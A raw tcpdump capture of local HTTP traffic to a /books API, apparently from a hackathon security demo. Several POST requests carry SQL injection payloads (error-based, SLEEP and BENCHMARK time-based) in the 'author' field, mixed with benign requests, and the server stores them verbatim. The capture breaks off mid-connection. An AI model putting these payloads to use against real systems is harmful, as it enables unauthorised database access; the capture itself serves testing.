21:31:00.865573 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54466 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x0bef), seq 1719811245, win 43690, options [mss 65476,sackOK,TS val 6881129 ecr 0,nop,wscale 7], length 0
21:31:00.865619 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54466: Flags [S.], cksum 0x0030 (incorrect -> 0x9c19), seq 2812004438, ack 1719811246, win 43690, options [mss 65476,sackOK,TS val 6881129 ecr 6881129,nop,wscale 7], length 0
21:31:00.865644 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54466 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x6e4b), seq 1, ack 1, win 342, options [nop,nop,TS val 6881129 ecr 6881129], length 0
21:31:00.865767 IP6 (hlim 64, next-header TCP (6) payload length: 428) ::1.54466 > ::1.8080: Flags [P.], cksum 0x01b4 (incorrect -> 0x8cc9), seq 1:397, ack 1, win 342, options [nop,nop,TS val 6881129 ecr 6881129], length 396: HTTP, length: 396
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 260
	
	{"name":"Hackathon-Demo0","author":"RameshAND ROW(4115,7844)>(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4115=4115,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM (SELECT 9757 UNION SELECT 8982 UNION SELECT 5308 UNION SELECT 5233)a GROUP BY x)","price":"9.99"}[!http]
21:31:00.865806 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54466: Flags [.], cksum 0x0028 (incorrect -> 0x6cb7), seq 1, ack 397, win 350, options [nop,nop,TS val 6881129 ecr 6881129], length 0
21:31:00.883381 IP6 (hlim 64, next-header TCP (6) payload length: 432) ::1.8080 > ::1.54466: Flags [P.], cksum 0x01b8 (incorrect -> 0x7a67), seq 1:401, ack 397, win 350, options [nop,nop,TS val 6881147 ecr 6881129], length 400: HTTP, length: 400
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:31:00 GMT
	
	109
	{"id":4,"name":"Hackathon-Demo0","author":"RameshAND ROW(4115,7844)>(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4115=4115,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM (SELECT 9757 UNION SELECT 8982 UNION SELECT 5308 UNION SELECT 5233)a GROUP BY x)","price":9.99}
21:31:00.883403 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54466 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x6b03), seq 397, ack 401, win 350, options [nop,nop,TS val 6881147 ecr 6881147], length 0
21:31:00.883910 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54466: Flags [P.], cksum 0x002d (incorrect -> 0x26db), seq 401:406, ack 397, win 350, options [nop,nop,TS val 6881148 ecr 6881147], length 5: HTTP
21:31:00.883926 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54466 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x6afc), seq 397, ack 406, win 350, options [nop,nop,TS val 6881148 ecr 6881148], length 0
21:31:00.884234 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54466 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x6afb), seq 397, ack 406, win 350, options [nop,nop,TS val 6881148 ecr 6881148], length 0
21:31:00.885823 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54466: Flags [F.], cksum 0x0028 (incorrect -> 0x6af9), seq 406, ack 398, win 350, options [nop,nop,TS val 6881149 ecr 6881148], length 0
21:31:00.885862 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54466 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x6af7), seq 398, ack 407, win 350, options [nop,nop,TS val 6881150 ecr 6881149], length 0
21:31:00.895490 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54468 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x86e9), seq 2533331221, win 43690, options [mss 65476,sackOK,TS val 6881159 ecr 0,nop,wscale 7], length 0
21:31:00.895509 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54468: Flags [S.], cksum 0x0030 (incorrect -> 0x3301), seq 4076167409, ack 2533331222, win 43690, options [mss 65476,sackOK,TS val 6881159 ecr 6881159,nop,wscale 7], length 0
21:31:00.895523 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54468 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x0533), seq 1, ack 1, win 342, options [nop,nop,TS val 6881159 ecr 6881159], length 0
21:31:00.895594 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.54468 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x08e0), seq 1:197, ack 1, win 342, options [nop,nop,TS val 6881159 ecr 6881159], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo1","author":"Ramesh-P","price":"9.99"}[!http]
21:31:00.895608 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54468: Flags [.], cksum 0x0028 (incorrect -> 0x0467), seq 1, ack 197, win 350, options [nop,nop,TS val 6881159 ecr 6881159], length 0
21:31:00.898376 IP6 (hlim 64, next-header TCP (6) payload length: 232) ::1.8080 > ::1.54468: Flags [P.], cksum 0x00f0 (incorrect -> 0x55f8), seq 1:201, ack 197, win 350, options [nop,nop,TS val 6881162 ecr 6881159], length 200: HTTP, length: 200
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:31:00 GMT
	
	42
	{"id":5,"name":"Hackathon-Demo1","author":"Ramesh-P","price":9.99}
21:31:00.898393 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54468 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x0399), seq 197, ack 201, win 350, options [nop,nop,TS val 6881162 ecr 6881162], length 0
21:31:00.898637 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54468: Flags [P.], cksum 0x002d (incorrect -> 0xbf71), seq 201:206, ack 197, win 350, options [nop,nop,TS val 6881162 ecr 6881162], length 5: HTTP
21:31:00.898654 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54468 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x0394), seq 197, ack 206, win 350, options [nop,nop,TS val 6881162 ecr 6881162], length 0
21:31:00.898899 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54468 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x0392), seq 197, ack 206, win 350, options [nop,nop,TS val 6881163 ecr 6881162], length 0
21:31:00.900288 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54468: Flags [F.], cksum 0x0028 (incorrect -> 0x038f), seq 206, ack 198, win 350, options [nop,nop,TS val 6881164 ecr 6881163], length 0
21:31:00.900308 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54468 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x038e), seq 198, ack 207, win 350, options [nop,nop,TS val 6881164 ecr 6881164], length 0
21:31:00.908482 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54470 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x7afd), seq 2141107283, win 43690, options [mss 65476,sackOK,TS val 6881172 ecr 0,nop,wscale 7], length 0
21:31:00.908503 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54470: Flags [S.], cksum 0x0030 (incorrect -> 0xd09e), seq 2622819835, ack 2141107284, win 43690, options [mss 65476,sackOK,TS val 6881172 ecr 6881172,nop,wscale 7], length 0
21:31:00.908520 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54470 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xa2d0), seq 1, ack 1, win 342, options [nop,nop,TS val 6881172 ecr 6881172], length 0
21:31:00.908598 IP6 (hlim 64, next-header TCP (6) payload length: 239) ::1.54470 > ::1.8080: Flags [P.], cksum 0x00f7 (incorrect -> 0x4836), seq 1:208, ack 1, win 342, options [nop,nop,TS val 6881172 ecr 6881172], length 207: HTTP, length: 207
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 72
	
	{"name":"Hackathon-Demo2","author":"Ramesh AND SLEEP(5)","price":"9.99"}[!http]
21:31:00.908613 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54470: Flags [.], cksum 0x0028 (incorrect -> 0xa1f9), seq 1, ack 208, win 350, options [nop,nop,TS val 6881172 ecr 6881172], length 0
21:31:00.910590 IP6 (hlim 64, next-header TCP (6) payload length: 243) ::1.8080 > ::1.54470: Flags [P.], cksum 0x00fb (incorrect -> 0x8226), seq 1:212, ack 208, win 350, options [nop,nop,TS val 6881174 ecr 6881172], length 211: HTTP, length: 211
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:31:00 GMT
	
	4d
	{"id":6,"name":"Hackathon-Demo2","author":"Ramesh AND SLEEP(5)","price":9.99}
21:31:00.910609 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54470 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xa122), seq 208, ack 212, win 350, options [nop,nop,TS val 6881174 ecr 6881174], length 0
21:31:00.910875 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54470: Flags [P.], cksum 0x002d (incorrect -> 0x5cfa), seq 212:217, ack 208, win 350, options [nop,nop,TS val 6881175 ecr 6881174], length 5: HTTP
21:31:00.910892 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54470 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xa11b), seq 208, ack 217, win 350, options [nop,nop,TS val 6881175 ecr 6881175], length 0
21:31:00.911137 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54470 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xa11a), seq 208, ack 217, win 350, options [nop,nop,TS val 6881175 ecr 6881175], length 0
21:31:00.917739 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54470: Flags [F.], cksum 0x0028 (incorrect -> 0xa113), seq 217, ack 209, win 350, options [nop,nop,TS val 6881181 ecr 6881175], length 0
21:31:00.917757 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54470 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xa10d), seq 209, ack 218, win 350, options [nop,nop,TS val 6881181 ecr 6881181], length 0
21:31:00.920982 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54472 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xbd28), seq 1138601434, win 43690, options [mss 65476,sackOK,TS val 6881185 ecr 0,nop,wscale 7], length 0
21:31:00.920999 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54472: Flags [S.], cksum 0x0030 (incorrect -> 0x3ccb), seq 1124744504, ack 1138601435, win 43690, options [mss 65476,sackOK,TS val 6881185 ecr 6881185,nop,wscale 7], length 0
21:31:00.921013 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54472 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x0efd), seq 1, ack 1, win 342, options [nop,nop,TS val 6881185 ecr 6881185], length 0
21:31:00.921111 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.54472 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x10aa), seq 1:197, ack 1, win 342, options [nop,nop,TS val 6881185 ecr 6881185], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo3","author":"Ramesh-P","price":"9.99"}[!http]
21:31:00.921128 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54472: Flags [.], cksum 0x0028 (incorrect -> 0x0e31), seq 1, ack 197, win 350, options [nop,nop,TS val 6881185 ecr 6881185], length 0
21:31:00.922987 IP6 (hlim 64, next-header TCP (6) payload length: 232) ::1.8080 > ::1.54472: Flags [P.], cksum 0x00f0 (incorrect -> 0x5bc3), seq 1:201, ack 197, win 350, options [nop,nop,TS val 6881187 ecr 6881185], length 200: HTTP, length: 200
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:31:00 GMT
	
	42
	{"id":7,"name":"Hackathon-Demo3","author":"Ramesh-P","price":9.99}
21:31:00.923007 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54472 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x0d65), seq 197, ack 201, win 350, options [nop,nop,TS val 6881187 ecr 6881187], length 0
21:31:00.923232 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54472: Flags [P.], cksum 0x002d (incorrect -> 0xc93d), seq 201:206, ack 197, win 350, options [nop,nop,TS val 6881187 ecr 6881187], length 5: HTTP
21:31:00.923249 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54472 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x0d60), seq 197, ack 206, win 350, options [nop,nop,TS val 6881187 ecr 6881187], length 0
21:31:00.923404 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54472 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x0d5f), seq 197, ack 206, win 350, options [nop,nop,TS val 6881187 ecr 6881187], length 0
21:31:00.923603 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54472: Flags [F.], cksum 0x0028 (incorrect -> 0x0d5e), seq 206, ack 198, win 350, options [nop,nop,TS val 6881187 ecr 6881187], length 0
21:31:00.923621 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54472 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x0d5e), seq 198, ack 207, win 350, options [nop,nop,TS val 6881187 ecr 6881187], length 0
21:31:00.932213 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54474 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x8f80), seq 2773056009, win 43690, options [mss 65476,sackOK,TS val 6881196 ecr 0,nop,wscale 7], length 0
21:31:00.932242 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54474: Flags [S.], cksum 0x0030 (incorrect -> 0x14e2), seq 1010056772, ack 2773056010, win 43690, options [mss 65476,sackOK,TS val 6881196 ecr 6881196,nop,wscale 7], length 0
21:31:00.932268 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54474 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe713), seq 1, ack 1, win 342, options [nop,nop,TS val 6881196 ecr 6881196], length 0
21:31:00.932369 IP6 (hlim 64, next-header TCP (6) payload length: 240) ::1.54474 > ::1.8080: Flags [P.], cksum 0x00f8 (incorrect -> 0x6f6f), seq 1:209, ack 1, win 342, options [nop,nop,TS val 6881196 ecr 6881196], length 208: HTTP, length: 208
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 73
	
	{"name":"Hackathon-Demo4","author":"Ramesh AND SLEEP(5)#","price":"9.99"}[!http]
21:31:00.932385 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54474: Flags [.], cksum 0x0028 (incorrect -> 0xe63b), seq 1, ack 209, win 350, options [nop,nop,TS val 6881196 ecr 6881196], length 0
21:31:00.935664 IP6 (hlim 64, next-header TCP (6) payload length: 244) ::1.8080 > ::1.54474: Flags [P.], cksum 0x00fc (incorrect -> 0xbb49), seq 1:213, ack 209, win 350, options [nop,nop,TS val 6881199 ecr 6881196], length 212: HTTP, length: 212
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:31:00 GMT
	
	4e
	{"id":8,"name":"Hackathon-Demo4","author":"Ramesh AND SLEEP(5)#","price":9.99}
21:31:00.935681 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54474 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe561), seq 209, ack 213, win 350, options [nop,nop,TS val 6881199 ecr 6881199], length 0
21:31:00.936006 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54474: Flags [P.], cksum 0x002d (incorrect -> 0xa139), seq 213:218, ack 209, win 350, options [nop,nop,TS val 6881200 ecr 6881199], length 5: HTTP
21:31:00.936025 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54474 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe55a), seq 209, ack 218, win 350, options [nop,nop,TS val 6881200 ecr 6881200], length 0
21:31:00.936402 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54474 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xe559), seq 209, ack 218, win 350, options [nop,nop,TS val 6881200 ecr 6881200], length 0
21:31:00.937017 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54474: Flags [F.], cksum 0x0028 (incorrect -> 0xe557), seq 218, ack 210, win 350, options [nop,nop,TS val 6881201 ecr 6881200], length 0
21:31:00.937041 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54474 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe556), seq 210, ack 219, win 350, options [nop,nop,TS val 6881201 ecr 6881201], length 0
21:31:00.946570 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54476 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x559c), seq 3903484028, win 43690, options [mss 65476,sackOK,TS val 6881210 ecr 0,nop,wscale 7], length 0
21:31:00.946591 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54476: Flags [S.], cksum 0x0030 (incorrect -> 0xbc98), seq 1906714409, ack 3903484029, win 43690, options [mss 65476,sackOK,TS val 6881210 ecr 6881210,nop,wscale 7], length 0
21:31:00.946638 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54476 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x8eca), seq 1, ack 1, win 342, options [nop,nop,TS val 6881210 ecr 6881210], length 0
21:31:00.946749 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.54476 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x8e77), seq 1:197, ack 1, win 342, options [nop,nop,TS val 6881210 ecr 6881210], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo5","author":"Ramesh-P","price":"9.99"}[!http]
21:31:00.946770 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54476: Flags [.], cksum 0x0028 (incorrect -> 0x8dfe), seq 1, ack 197, win 350, options [nop,nop,TS val 6881210 ecr 6881210], length 0
21:31:00.948977 IP6 (hlim 64, next-header TCP (6) payload length: 232) ::1.8080 > ::1.54476: Flags [P.], cksum 0x00f0 (incorrect -> 0xd78f), seq 1:201, ack 197, win 350, options [nop,nop,TS val 6881213 ecr 6881210], length 200: HTTP, length: 200
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:31:00 GMT
	
	42
	{"id":9,"name":"Hackathon-Demo5","author":"Ramesh-P","price":9.99}
21:31:00.948996 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54476 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x8d30), seq 197, ack 201, win 350, options [nop,nop,TS val 6881213 ecr 6881213], length 0
21:31:00.949232 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54476: Flags [P.], cksum 0x002d (incorrect -> 0x4909), seq 201:206, ack 197, win 350, options [nop,nop,TS val 6881213 ecr 6881213], length 5: HTTP
21:31:00.949249 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54476 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x8d2b), seq 197, ack 206, win 350, options [nop,nop,TS val 6881213 ecr 6881213], length 0
21:31:00.949546 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54476 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x8d2a), seq 197, ack 206, win 350, options [nop,nop,TS val 6881213 ecr 6881213], length 0
21:31:00.950371 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54476: Flags [F.], cksum 0x0028 (incorrect -> 0x8d28), seq 206, ack 198, win 350, options [nop,nop,TS val 6881214 ecr 6881213], length 0
21:31:00.950391 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54476 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x8d27), seq 198, ack 207, win 350, options [nop,nop,TS val 6881214 ecr 6881214], length 0
21:31:00.969342 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54478 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x7219), seq 215822260, win 43690, options [mss 65476,sackOK,TS val 6881233 ecr 0,nop,wscale 7], length 0
21:31:00.969385 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54478: Flags [S.], cksum 0x0030 (incorrect -> 0xb880), seq 454860337, ack 215822261, win 43690, options [mss 65476,sackOK,TS val 6881233 ecr 6881233,nop,wscale 7], length 0
21:31:00.969412 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54478 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x8ab2), seq 1, ack 1, win 342, options [nop,nop,TS val 6881233 ecr 6881233], length 0
21:31:00.969518 IP6 (hlim 64, next-header TCP (6) payload length: 317) ::1.54478 > ::1.8080: Flags [P.], cksum 0x0145 (incorrect -> 0x81cd), seq 1:286, ack 1, win 342, options [nop,nop,TS val 6881233 ecr 6881233], length 285: HTTP, length: 285
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 149
	
	{"name":"Hackathon-Demo6","author":"Ramesh PROCEDURE ANALYSE(EXTRACTVALUE(3695,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x50477a4b))))),1)","price":"9.99"}[!http]
21:31:00.969533 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54478: Flags [.], cksum 0x0028 (incorrect -> 0x898d), seq 1, ack 286, win 350, options [nop,nop,TS val 6881233 ecr 6881233], length 0
21:31:00.972550 IP6 (hlim 64, next-header TCP (6) payload length: 321) ::1.8080 > ::1.54478: Flags [P.], cksum 0x0149 (incorrect -> 0x121f), seq 1:290, ack 286, win 350, options [nop,nop,TS val 6881236 ecr 6881233], length 289: HTTP, length: 289
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:31:00 GMT
	
	9b
	{"id":10,"name":"Hackathon-Demo6","author":"Ramesh PROCEDURE ANALYSE(EXTRACTVALUE(3695,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x50477a4b))))),1)","price":9.99}
21:31:00.972569 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54478 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x8866), seq 286, ack 290, win 350, options [nop,nop,TS val 6881236 ecr 6881236], length 0
21:31:00.972828 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54478: Flags [P.], cksum 0x002d (incorrect -> 0x443e), seq 290:295, ack 286, win 350, options [nop,nop,TS val 6881237 ecr 6881236], length 5: HTTP
21:31:00.972861 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54478 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x885f), seq 286, ack 295, win 350, options [nop,nop,TS val 6881237 ecr 6881237], length 0
21:31:00.973211 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54478 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x885e), seq 286, ack 295, win 350, options [nop,nop,TS val 6881237 ecr 6881237], length 0
21:31:00.976412 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54478: Flags [F.], cksum 0x0028 (incorrect -> 0x885a), seq 295, ack 287, win 350, options [nop,nop,TS val 6881240 ecr 6881237], length 0
21:31:00.976429 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54478 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x8857), seq 287, ack 296, win 350, options [nop,nop,TS val 6881240 ecr 6881240], length 0
21:31:00.985510 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54480 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xa6e8), seq 4107735768, win 43690, options [mss 65476,sackOK,TS val 6881249 ecr 0,nop,wscale 7], length 0
21:31:00.985535 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54480: Flags [S.], cksum 0x0030 (incorrect -> 0x8a8a), seq 2143984696, ack 4107735769, win 43690, options [mss 65476,sackOK,TS val 6881249 ecr 6881249,nop,wscale 7], length 0
21:31:00.985573 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54480 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x5cbc), seq 1, ack 1, win 342, options [nop,nop,TS val 6881249 ecr 6881249], length 0
21:31:00.985684 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.54480 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x5a69), seq 1:197, ack 1, win 342, options [nop,nop,TS val 6881249 ecr 6881249], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo7","author":"Ramesh-P","price":"9.99"}[!http]
21:31:00.985700 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54480: Flags [.], cksum 0x0028 (incorrect -> 0x5bf0), seq 1, ack 197, win 350, options [nop,nop,TS val 6881249 ecr 6881249], length 0
21:31:00.988795 IP6 (hlim 64, next-header TCP (6) payload length: 233) ::1.8080 > ::1.54480: Flags [P.], cksum 0x00f1 (incorrect -> 0x8673), seq 1:202, ack 197, win 350, options [nop,nop,TS val 6881252 ecr 6881249], length 201: HTTP, length: 201
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:31:00 GMT
	
	43
	{"id":11,"name":"Hackathon-Demo7","author":"Ramesh-P","price":9.99}
21:31:00.988856 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54480 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x5b21), seq 197, ack 202, win 350, options [nop,nop,TS val 6881252 ecr 6881252], length 0
21:31:00.989327 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54480: Flags [P.], cksum 0x002d (incorrect -> 0x16f9), seq 202:207, ack 197, win 350, options [nop,nop,TS val 6881253 ecr 6881252], length 5: HTTP
21:31:00.989351 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54480 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x5b1a), seq 197, ack 207, win 350, options [nop,nop,TS val 6881253 ecr 6881253], length 0
21:31:00.989703 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54480 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x5b19), seq 197, ack 207, win 350, options [nop,nop,TS val 6881253 ecr 6881253], length 0
21:31:00.997782 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54480: Flags [F.], cksum 0x0028 (incorrect -> 0x5b10), seq 207, ack 198, win 350, options [nop,nop,TS val 6881261 ecr 6881253], length 0
21:31:00.997802 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54480 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x5b08), seq 198, ack 208, win 350, options [nop,nop,TS val 6881261 ecr 6881261], length 0
21:31:00.999918 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54482 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x3450), seq 3623264832, win 43690, options [mss 65476,sackOK,TS val 6881264 ecr 0,nop,wscale 7], length 0
21:31:00.999955 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54482: Flags [S.], cksum 0x0030 (incorrect -> 0x7e70), seq 2169058348, ack 3623264833, win 43690, options [mss 65476,sackOK,TS val 6881264 ecr 6881264,nop,wscale 7], length 0
21:31:00.999987 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54482 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x50a2), seq 1, ack 1, win 342, options [nop,nop,TS val 6881264 ecr 6881264], length 0
